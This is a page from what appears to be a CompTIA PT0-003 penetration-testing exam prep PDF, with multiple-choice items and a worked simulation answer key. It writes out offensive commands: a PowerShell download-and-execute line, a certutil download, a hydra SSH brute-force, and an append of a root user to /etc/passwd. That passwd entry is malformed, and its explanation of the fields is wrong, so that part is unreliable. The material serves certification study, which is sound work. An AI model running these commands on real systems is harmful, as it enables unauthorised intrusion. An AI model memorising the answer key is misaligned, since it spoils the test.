Newly Released CompTIA PT0-003 Exam PDF

Page: 9 / 9

Question 36

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

powershell.exe impo C:\tools\foo.ps1

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ")

rundll32.exe c:\path\foo.dll,functName

Question 37

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

Options:

Enable monitoring mode using Aircrack-ng.

Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.

Run KARMA to break the password.

Research WiGLE.net for potential nearby client access points.

Question 38

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

· Select the appropriate set of commands to escalate privileges.

· Identify which remediation steps should be taken.

Options:

Answer:

See the Explanation below for complete solution.

Explanation:

The command that would most likely exploit the services is:

hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22

The appropriate set of commands to escalate privileges is:

echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd

The remediations that should be taken after the successful privilege escalation are:

Remove the SUID bit from cp.

Make backup script not world-writable.

Comprehensive Step-by-Step Explanation of the Simulation

Part 1: Exploiting Vulnerable Service

Nmap Scan Analysis

Command: nmap -sC -T4 192.168.10.2

Purpose: This command runs a default script scan with timing template 4 (aggressive).

Output:

bash

Copy code

Port State Service

22/tcp open ssh

23/tcp closed telnet

80/tcp open http

111/tcp closed rpcbind

445/tcp open samba

3389/tcp closed rdp

Ports open are SSH (22), HTTP (80), and Samba (445).

Enumerating Samba Shares

Command: enum4linux -S 192.168.10.2

Purpose: To enumerate Samba shares and users.

Output:

makefile

Copy code

user:[games] rid:[0x3f2]

user:[nobody] rid:[0x1f5]

user:[bind] rid:[0x4ba]

user:[proxy] rid:[0x42]

user:[syslog] rid:[0x4ba]

user:[www-data] rid:[0x42a]

user:[root] rid:[0x3e8]

user:[news] rid:[0x3fa]

user:[lowpriv] rid:[0x3fa]

We identify a user lowpriv.

Selecting Exploit Command

Hydra Command: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22

Purpose: To perform a brute force attack on SSH using the lowpriv user and a list of the 500 worst passwords.

Explanation:

-l lowpriv: Specifies the username.

-P 500-worst-passwords.txt: Specifies the password list.

-t 4: Uses 4 tasks/threads for the attack.

ssh://192.168.10.2:22: Specifies the SSH service and port.

Executing the Hydra Command

Result: Successful login as lowpriv user if a match is found.

Part 2: Privilege Escalation and Remediation

Finding SUID Binaries and Configuration Files

Command: find / -perm -2 -type f 2>/dev/null | xargs ls -l

Purpose: To find world-writable files.

Command: find / -perm -u=s -type f 2>/dev/null | xargs ls -l

Purpose: To find files with SUID permission.

Command: grep "/bin/bash" /etc/passwd | cut -d':' -f1-4,6,7

Purpose: To identify users with bash shell access.

Selecting Privilege Escalation Command

Command: echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd

Purpose: To create a new root user entry in the passwd file.

Explanation:

root2: Username.

5ZOYXRFHVZ7OY: Password hash.

::0:0: User and group ID (root).

/root: Home directory.

/bin/bash: Default shell.

Executing the Privilege Escalation Command

Result: Creation of a new root user root2 with a specified password.

Remediation Steps Post-Exploitation

Remove SUID Bit from cp:

Command: chmod u-s /bin/cp

Purpose: Removing the SUID bit from cp to prevent misuse.

Make Backup Script Not World-Writable:

Command: chmod o-w /path/to/backup/script

Purpose: Ensuring backup script is not writable by all users to prevent unauthorized modifications.

Execution and Verification

Verifying Hydra Attack:

Run the Hydra command and monitor for successful login attempts.

Verifying Privilege Escalation:

After appending the new root user to the passwd file, attempt to switch user to root2 and check root privileges.

Implementing Remediation:

Apply the remediation commands to secure the system and verify the changes have been implemented.

By following these detailed steps, one can replicate the simulation and ensure a thorough understanding of both the exploitation and the necessary remediations.

Question 39

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.